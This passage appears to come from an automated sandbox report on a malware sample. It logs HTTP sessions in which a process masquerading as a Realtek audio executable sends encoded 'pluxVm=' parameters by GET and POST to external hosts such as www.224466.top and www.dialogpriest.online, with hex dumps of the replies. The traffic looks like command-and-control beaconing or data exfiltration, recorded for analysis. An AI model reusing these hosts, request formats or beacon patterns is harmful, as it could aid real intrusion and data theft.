                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 4b 51 6c 75 4e 30 2b 62 4a 62 2b 5a 75 6d 68 51 72 77 66 4e 49 48 57 48 5a 34 57 6d 49 55 4a 6d 45 44 6f 6a 6b 73 54 57 2b 76 31 57 68 48 6e 45 55 67 7a 7a 6a 50 51 63 52 37 7a 4c 34 79 55 73 63 54 30 67 4e 5a 30 47 44 56 65 6d 32 43 6d 56 53 79 49 68 76 56 56 73 49 5a 78 36 4b 68 79 5a 58 44 57 72 51 72 6e 37 31 66 47 51 6b 44 30 4a 75 6b 66 67 61 4a 70 77 56 39 38 65 46 74 75 58 4f 34 56 30 57 63 36 51 45 31 79 71 2f 64 77 69 4b 58 7a 54 64 43 73 39 48 58 6a 75 73 46 76 32 69 54 56 71 6b 37 37 48 51 38 63 41 34 38 68 71 2b 4e 76 38 62 65 77 44 32 4d 67 59 48 64 35 34 72 39 6f 76 75 65 61 54 5a 31 77 38 6c 75 6e 45 30 4a 51 52 75 73 59 62 34 48 42 48 49 2f 48 75 50 43 51 6c 46 39 37 6f 65 30 6b 44 6b 31 6f 33 63 49 73 64 76 2f 6e 30 4a 49 52 47 35 5a 39 59 6a 58 42 44 6b 69 6d 73 71 6a 6a 72 76 74 48 38 67 79 4c 49 49 70 55 6b 4f 41 41 6f 53 2b 6e 52 44 79 6d 78 6c 7a 2f 6e 58 38 34 39 63 33 46 78 68 6c 63 36 34 55 61 6f 37 38 43 39 4b 76 58 4b 36 51 73 6f 5a 55 51 59 36 4c 7a [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=KQluN0+bJb+ZumhQrwfNIHWHZ4WmIUJmEDojksTW+v1WhHnEUgzzjPQcR7zL4yUscT0gNZ0GDVem2CmVSyIhvVVsIZx6KhyZXDWrQrn71fGQkD0JukfgaJpwV98eFtuXO4V0Wc6QE1yq/dwiKXzTdCs9HXjusFv2iTVqk77HQ8cA48hq+Nv8bewD2MgYHd54r9ovueaTZ1w8lunE0JQRusYb4HBHI/HuPCQlF97oe0kDk1o3cIsdv/n0JIRG5Z9YjXBDkimsqjjrvtH8gyLIIpUkOAAoS+nRDymxlz/nX849c3Fxhlc64Uao78C9KvXK6QsoZUQY6LzxMMQijtX9hT4Dabj0+yXPu5qA6wb2D9raBrEHQTdRmJu0DulYwXkyQrNSgaML/M9PVVf0u7MFtiA6w4jq1/A93iN7L8/uuF7ULUiybgC5fHdqOTzOfnCDudwDmzEdLJlFPBIvPzMcYcId7YeGpd1w5xFJh1lZ6Fe9QIsQPLDWnhtYmoouJ/fSY3FzL9mKku4XdD9EfWu8z3es54v0uhGjWRPb+1GG2CovH8YG5B7m0IYPg165ilIwlRNg/lKJih8iHLh0IWSWEIe/dzX9crAHRsejrpRKP6QiAgROThdfepOQ7KRQwZAfUSUmq77RHXOpOrv4vON4bgBkV+/pTEVJ9liZ2fw1kapYwS0CBKHGGGfx8Hq7OJj4HjjLkaWNA4DgHlDjOT/PD9L2/5niGgCUrDb2Euz+C2EwO6Bh36ExkuDauXTGKSShiBg8J9msi/n2tKjmElqfOcRpMWzcNpVQTYINMr6ue7bJI22VwoSVBHc3JPlhYRdgY4fAZ0f+XIaHv7S7jemisr4CXoe03+ZMh7oSk/cWFoXHXt2K3w3zkVGTSoceurIKCFVNzhd/LO/lc5pQQyqVB7pgavMqJMTwsK1d5AGP7AhRLQ3bCYH3DKxLvdohY2RdRZefm2+6dWaUNA4dfJ+CsBcfYd393TxpdkJYRJ8IMtghS [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:54:45.554270029 CET5292OUTData Raw: 6f 6a 73 6f 4b 54 67 53 49 36 55 41 52 38 39 54 63 31 70 30 66 54 63 48 4e 36 46 49 47 49 53 68 45 31 75 4a 39 74 36 78 7a 31 65 63 56 6c 57 74 73 62 6f 4d 79 59 72 7a 45 58 68 66 4c 54 76 48 77 62 59 35 76 68 73 66 4f 57 64 72 4b 44 70 46 4c 58
                                                                                                                                                                                                                                Data Ascii: ojsoKTgSI6UAR89Tc1p0fTcHN6FIGIShE1uJ9t6xz1ecVlWtsboMyYrzEXhfLTvHwbY5vhsfOWdrKDpFLXyBdl5XWurngWjPxyJTbhACD3gfGVYOtitXR/pGaND9tTfEdoSLcq68aneGeCcPVNBF5hcgeoZqWUWU874Ovj2rNhdeQphCUpFu5ZwqlGonBBGSmFpuQK3aTZL7ulyz5Opr0bYUFVvyeSqFiSIhHixQQStEvYbnzja
                                                                                                                                                                                                                                Dec 3, 2024 14:54:45.758339882 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:45 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Raw: 37 36 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 77 77 77 2e 64 69 61 6c 6f 67 70 72 69 65 73 74 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: 761<!DOCTYPE html><html> <head> <meta charset="utf-8"><title>www.dialogpriest.online</title> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> <center><p>El dominio <a href="http://dialo [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:54:45.758408070 CET820INData Raw: 6f 2e 63 6f 6d 2f 63 68 65 63 6b 64 6f 6d 61 69 6e 6f 66 66 65 72 2e 70 68 70 3f 6c 61 6e 67 75 61 67 65 3d 65 73 26 64 6f 6d 61 69 6e 3d 64 69 61 6c 6f 67 70 72 69 65 73 74 2e 6f 6e 6c 69 6e 65 26 70 61 72 74 6e 65 72 69 64 3d 33 31 38 38 37 36
                                                                                                                                                                                                                                Data Ascii: o.com/checkdomainoffer.php?language=es&domain=dialogpriest.online&partnerid=318876">venta</a> y est alojado en <a href="http://www.wesped.com/" target="_top" alt="Web Hosting y dominios">Wesped</a></p> <p>Compra <a href="https://www.w


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                52192.168.11.2049811176.31.209.107807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:54:48.270658016 CET426OUTGET /7znk/?Z1EO=OvfHeluUy&pluxVm=HSNOOCSycaWbpWp1pFuTHgyNeMyGT259cyc1jurPotVrvnXLICbtqfVvbaWKwlIlASBzdIxRFAa/wDiZdCYNsQsDHbsFXQKeKhShRpSMwKmQ7kRuiU3WeuA= HTTP/1.1
                                                                                                                                                                                                                                Host: www.dialogpriest.online
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:54:48.464325905 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:47 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Raw: 37 36 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 77 77 77 2e 64 69 61 6c 6f 67 70 72 69 65 73 74 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: 761<!DOCTYPE html><html> <head> <meta charset="utf-8"><title>www.dialogpriest.online</title> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> <center><p>El dominio <a href="http://dialo [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:54:48.464380026 CET820INData Raw: 6f 2e 63 6f 6d 2f 63 68 65 63 6b 64 6f 6d 61 69 6e 6f 66 66 65 72 2e 70 68 70 3f 6c 61 6e 67 75 61 67 65 3d 65 73 26 64 6f 6d 61 69 6e 3d 64 69 61 6c 6f 67 70 72 69 65 73 74 2e 6f 6e 6c 69 6e 65 26 70 61 72 74 6e 65 72 69 64 3d 33 31 38 38 37 36
                                                                                                                                                                                                                                Data Ascii: o.com/checkdomainoffer.php?language=es&domain=dialogpriest.online&partnerid=318876">venta</a> y est alojado en <a href="http://www.wesped.com/" target="_top" alt="Web Hosting y dominios">Wesped</a></p> <p>Compra <a href="https://www.w


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                53192.168.11.204981245.197.47.177807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.389543056 CET674OUTPOST /8orf/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.224466.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.224466.top
                                                                                                                                                                                                                                Referer: http://www.224466.top/8orf/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 2f 42 34 63 2b 32 54 70 61 43 42 62 44 57 6b 67 36 6f 4b 75 38 78 49 62 6a 70 33 53 69 6e 57 59 4d 6d 45 41 54 55 49 45 76 31 49 76 5a 52 70 31 64 53 69 71 38 50 2f 6e 36 50 4d 39 4e 6b 4e 56 71 4e 74 53 78 6b 50 4a 44 71 32 5a 54 57 6d 50 4b 63 39 34 56 4f 78 50 63 36 72 44 4b 53 63 47 2b 6e 47 36 31 75 42 57 2f 36 5a 4f 50 4c 63 66 4b 32 36 78 41 72 31 50 72 68 62 74 6f 4b 2b 79 66 68 79 41 6c 42 6b 75 66 78 2f 79 35 55 46 74 75 37 6e 36 35 72 77 4c 66 6e 30 69 65 72 46 74 67 48 59 49 48 62 66 61 6e 35 69 4f 34 62 53 34 78 6a 77 61 55 2f 58 33 46 4b 35 31 52 77 44 38 32 77 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=/B4c+2TpaCBbDWkg6oKu8xIbjp3SinWYMmEATUIEv1IvZRp1dSiq8P/n6PM9NkNVqNtSxkPJDq2ZTWmPKc94VOxPc6rDKScG+nG61uBW/6ZOPLcfK26xAr1PrhbtoK+yfhyAlBkufx/y5UFtu7n65rwLfn0ierFtgHYIHbfan5iO4bS4xjwaU/X3FK51RwD82w==
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702064991 CET536INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:54 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                ETag: W/"6735d5d4-11e4a"
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Data Raw: 33 65 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 69 93 1b c7 91 e8 77 45 f8 3f c0 63 ef 92 0c 93 33 83 6e a0 01 48 24 f7 e9 a0 bc 7e e1 7d f6 ae bd bb b1 f1 e2 c5 44 1f d5 f7 dd 8d d3 56 04 29 89 f7 2d 51 07 c5 91 28 4a a4 44 5d 3c 44 4a 24 67 78 44 f8 a7 d8 d3 00 e6 cb f3 5f 78 59 dd 0d a0 ba d1 98 01 30 03 7a fc 62 47 0a 02 dd e8 ae ca ca cc ca ca ca ca e3 85 fd 3f 7d ed 37 af fe fe bf 7e 7b 28 27 fb 86 7e f0 85 fd f8 23 a7 b3 a6 74 60 0e 99 73 f8 06 62 85 83 2f e4 e0 6f bf 81 7c 36 c7 cb ac eb 21 ff c0 dc bf ff fe f5 7d 65 fc 84 af f8 3a 3a f8 b2 f4 8f 3f 6b 14 0e 55 5e 7e 09 3e 8b 2f d3 79 fc 59 2a e5 5f c7 9f 85 43 af bc fc d2 9f 1e ec 0e bf 52 af 85 8f 30 af bf f6 d2 1e fc 85 2e 84 cf 16 0f 95 0a e1 b3 af 1f 0a af cb 2f 97 2b e1 e7 e2 62 f4 3b fd fa e2 4b fb 17 a2 de 5e d8 af 2b a6 96 73 91 7e 60 ce 93 2d d7 e7 ab 7e 4e e1 2d 73 2e 27 bb 48 3c 30 b7 20 b2 35 7c 3d 0f ff 60 20 43 d8 4d d6 40 07 e6 34 d4 ac 5b ae e0
                                                                                                                                                                                                                                Data Ascii: 3ed8}iwE?c3nH$~}DV)-Q(JD]<DJ$gxD_xY0zbG?}7~{('~#t`sb/o|6!}e::?kU^~>/yY*_CR0./+b;K^+s~`-~N-s.'H<0 5|=` CM@4[
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702116966 CET536INData Raw: cd e5 e0 77 1f 99 30 16 16 03 9f 00 16 ae 99 d7 5f a1 31 00 95 e2 a1 72 38 18 a6 74 28 04 f4 95 57 18 f2 b3 70 a8 b8 18 fe fe 7a 31 1a f4 cb af 55 5e da 9b 89 8f e2 2b 95 a8 29 fc e8 de cc 5e 01 0d 61 af 45 3c dc b0 b7 e8 15 06 be bc 94 1a 89 80
                                                                                                                                                                                                                                Data Ascii: w0_1r8t(Wpz1U^+)^aE<<Ul_`z1S8tbH"](^J5-f^{%ZDRa13J`JD?L!KP Q8Qb]UQbZ|%lR4IWuX@}P
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702321053 CET536INData Raw: c7 cf 86 fd b3 b1 04 97 7d df 7e 71 61 81 a2 0a 05 86 99 f7 2d 9b 78 28 7c 50 31 a4 1c 46 c2 dc 42 d5 d6 2d 56 f0 16 58 5d 87 9b 0b d4 22 cc 82 52 be bc 90 df 07 5f 7e f9 af 8b c5 5f fd 4b 91 9e b7 4d 69 2e c7 ea 20 ee c9 ee 16 d8 78 dc 0b 80 9d
                                                                                                                                                                                                                                Data Ascii: }~qa-x(|P1FB-VX]"R_~_KMi. xxv^j(XHrd}2|Mw=e*g_rpPJT)&Tq-%a4rRy`nw'qXkN#aDdwn6+I+a5amBLIW<y`
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702370882 CET536INData Raw: 29 86 50 29 e9 51 47 30 eb fc b4 6c ce 6a 23 c2 cd 80 eb d5 86 e4 5a 8e e0 92 32 7a d4 7b 1b dd 87 a9 07 fb 8b 51 4f 10 13 33 eb 91 c4 c0 cc ba dd 30 ca b6 cf f5 c9 ed 2a 92 bc 19 7c 83 e5 22 5e 04 b2 d8 7b 23 8e 1b 8d fa 11 c0 67 dc 1e 7f 46 23
                                                                                                                                                                                                                                Data Ascii: )P)QG0lj#Z2z{QO30*|"^{#gF#!XGyIc$fW8wIpU&%GMjz>~3@P'$w}Kk}L28]jSF)37U}j5d4uBiz RG8)
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702406883 CET536INData Raw: 0c 10 ab 19 cb 70 9a 8a ba e6 c1 be 4e 43 04 15 db ef df 59 ff 60 b5 fb c3 db dd 5b b7 e7 0e 92 57 9b 6b 02 2d d3 74 59 53 16 9c 49 74 f9 a2 ee d4 c0 96 83 b4 a9 34 01 97 71 7c ae 58 33 e4 a9 35 01 a4 95 d4 9a 6d 30 52 ac 09 24 87 3c b1 26 40 a2
                                                                                                                                                                                                                                Data Ascii: pNCY`[Wk-tYSIt4q|X35m0R$<&@1H2YkVP[D5Kq~KhNvz>$OXwx,AZ{o`%G`I8AIC5l8i&pXpY:j6}*hgYulQo+k,&f*Ft
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702442884 CET536INData Raw: e0 cc fb 7d bb 44 78 b5 b9 b4 83 d3 02 8e 6f 98 62 5f 70 65 80 10 f1 18 61 21 73 c1 d3 00 e9 79 56 9d 4a da 15 41 be 0a 25 4f ef ab e2 13 db b8 5d 59 85 8d 3d 0f d2 36 b2 71 c7 a6 98 78 c8 93 4a bb 04 4a 7b d2 4e ca 97 25 dd a4 cc e2 ac a5 1d 9c
                                                                                                                                                                                                                                Data Ascii: }Dxob_pea!syVJA%O]Y=6qxJJ{N%vkWD2#7>_~Wn]O<9c3W#OC>ljlC"]dCn}I0SnF2p`rVeBwBq`x5J_eR
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702477932 CET536INData Raw: 3b ab 57 41 2d 4d de d8 1e 18 b7 4f 22 eb c8 71 44 96 33 b7 b8 bf 48 0a af 91 bc fb 9c 25 b2 c0 d2 25 b9 4e 09 5c c6 74 4a ad ab 9c ee d4 05 0d 89 66 83 b4 a6 ac 04 a7 ae 00 6f b5 57 2e e0 3d ec e0 6a 73 89 2c f9 ac 60 0a b6 d3 df 2a 64 80 30 b4
                                                                                                                                                                                                                                Data Ascii: ;WA-MO"qD3H%%N\tJfoW.=js,`*d0{@TS/`dqG(-'<DN'irfWq'u$WO#iI_t!Nl<_YW#OY3I<5uwsZg>}J=6y5+uU
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702512980 CET536INData Raw: a3 de d4 aa 66 75 ac 00 09 49 72 6a be e8 35 ad a1 00 89 82 88 04 88 18 a8 35 b7 21 40 c2 e7 0d 1e 49 4d 89 34 81 0d c7 93 6c 10 20 51 b6 24 4d ae 6b be 3b 45 80 04 1c 0d 18 15 97 f5 48 0d 23 ab f3 ed 08 90 f0 90 5a e7 68 0f c1 21 68 76 80 84 59
                                                                                                                                                                                                                                Data Ascii: fuIrj55!@IM4l Q$Mk;EH#Zh!hvY2G$8[Vu @G/L\T@2<gm8GdyHia)jj6DY)Mt(Zh-z-lDK[3nW%w 22
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702545881 CET536INData Raw: b1 8a e8 21 59 bc 13 02 24 0a f5 12 5f 41 92 01 13 27 bd 52 ec 80 00 09 4f b2 1d ad 59 a3 21 a7 41 0a ba 9d 10 20 81 f2 c8 66 05 b7 30 ac a7 fc 7d 07 48 98 55 9f ab 54 74 08 72 de 92 d9 77 67 06 48 70 9c 51 72 cc 96 36 c6 4a b1 dd 01 12 10 ce ad
                                                                                                                                                                                                                                Data Ascii: !Y$_A'ROY!A f0}HUTtrwgHpQr6J?!iVdBk68Ym#jFSQg G#3jEDymmS5&IVpKN MV(|;@BV9AT\;3@zYE(izu*
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702581882 CET536INData Raw: 87 8b 77 c6 08 c0 de ee 00 89 22 e3 83 72 6b 08 13 d9 dd c1 23 42 84 74 98 ba 37 d5 fe a2 2a 98 1a 65 70 82 3e b5 44 e6 15 4d d7 4b f5 72 a5 6f 4d 21 63 42 26 75 7b cd 0c 90 e0 1b 0a 58 f7 9b f2 ec 53 14 16 14 85 92 79 71 8b d6 94 82 51 ac 3b b5
                                                                                                                                                                                                                                Data Ascii: w"rk#Bt7*ep>DMKroM!cB&u{XSyqQ;:N;"mMC p^<s8$*aN}H|l&%2OZc%[;P!%KeYmot5 7)Hnf a%4UY
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.012851954 CET536INData Raw: ac 6a 56 4e f8 44 97 c8 42 2d b1 64 43 24 1a 7e 67 a3 a2 03 44 cd 09 4e 62 28 bb 62 a9 02 11 52 11 f7 86 eb 67 0c 59 a7 42 a4 24 ea 77 30 50 6f c5 6b 89 50 ef 06 27 5c 09 ce 3f ec dc 3a bc b6 7a 3a 2e 56 31 d4 c0 88 e0 a8 c4 48 2c d8 10 69 66 91
                                                                                                                                                                                                                                Data Ascii: jVNDB-dC$~gDNb(bRgYB$w0PokP'\?:z:.V1H,ifG},Vmh`Aa3)",EOr(|kj0>y3Ye%G%(pVge)f1D,3Pd/m%RPBU[2dR{P*jn/8ATsjW//OymmI{


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                54192.168.11.204981345.197.47.177807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.240030050 CET694OUTPOST /8orf/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.224466.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.224466.top
                                                                                                                                                                                                                                Referer: http://www.224466.top/8orf/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 2f 42 34 63 2b 32 54 70 61 43 42 62 44 33 55 67 34 4c 79 75 37 52 49 59 39 5a 33 53 73 48 57 63 4d 6d 59 41 54 51 51 71 75 47 38 76 5a 77 35 31 63 54 69 71 78 76 2f 6e 69 2f 4d 34 44 45 4d 62 71 4e 78 73 78 6c 7a 4a 44 75 65 5a 54 58 57 50 4b 4c 42 35 55 65 78 4e 46 71 72 4e 41 79 63 47 2b 6e 47 36 31 75 55 4c 2f 35 70 4f 50 36 4d 66 4c 54 57 79 4a 4c 31 4d 73 68 62 74 37 61 2b 32 66 68 79 79 6c 46 6c 4c 66 79 58 79 35 56 31 74 75 4a 66 35 7a 72 77 52 43 58 31 4f 59 36 34 63 74 58 78 31 47 39 54 65 76 4d 2b 75 39 4e 66 69 73 52 45 2b 58 73 4c 46 42 36 41 64 54 79 43 6e 72 34 49 47 4d 78 48 41 39 42 5a 75 42 73 69 52 77 54 59 44 72 32 45 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=/B4c+2TpaCBbD3Ug4Lyu7RIY9Z3SsHWcMmYATQQquG8vZw51cTiqxv/ni/M4DEMbqNxsxlzJDueZTXWPKLB5UexNFqrNAycG+nG61uUL/5pOP6MfLTWyJL1Mshbt7a+2fhyylFlLfyXy5V1tuJf5zrwRCX1OY64ctXx1G9TevM+u9NfisRE+XsLFB6AdTyCnr4IGMxHA9BZuBsiRwTYDr2E=
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.556756973 CET1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:57 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                ETag: W/"6735d5d4-11e4a"
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Data Raw: 33 65 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 69 93 1b c7 91 e8 77 45 f8 3f c0 63 ef 92 0c 93 33 83 6e a0 01 48 24 f7 e9 a0 bc 7e e1 7d f6 ae bd bb b1 f1 e2 c5 44 1f d5 f7 dd 8d d3 56 04 29 89 f7 2d 51 07 c5 91 28 4a a4 44 5d 3c 44 4a 24 67 78 44 f8 a7 d8 d3 00 e6 cb f3 5f 78 59 dd 0d a0 ba d1 98 01 30 03 7a fc 62 47 0a 02 dd e8 ae ca ca cc ca ca ca ca e3 85 fd 3f 7d ed 37 af fe fe bf 7e 7b 28 27 fb 86 7e f0 85 fd f8 23 a7 b3 a6 74 60 0e 99 73 f8 06 62 85 83 2f e4 e0 6f bf 81 7c 36 c7 cb ac eb 21 ff c0 dc bf ff fe f5 7d 65 fc 84 af f8 3a 3a f8 b2 f4 8f 3f 6b 14 0e 55 5e 7e 09 3e 8b 2f d3 79 fc 59 2a e5 5f c7 9f 85 43 af bc fc d2 9f 1e ec 0e bf 52 af 85 8f 30 af bf f6 d2 1e fc 85 2e 84 cf 16 0f 95 0a e1 b3 af 1f 0a af cb 2f 97 2b e1 e7 e2 62 f4 3b fd fa e2 4b fb 17 a2 de 5e d8 af 2b a6 96 73 91 7e 60 ce 93 2d d7 e7 ab 7e 4e e1 2d 73 2e 27 bb 48 3c 30 b7 20 b2 35 7c 3d 0f ff 60 20 43 d8 4d d6 40 07 e6 34 d4 ac 5b ae e0 cd e5 e0 77 1f 99 30 16 16 03 9f 00 16 ae 99 d7 5f a1 31 00 95 e2 a1 72 38 [TRUNCATED]
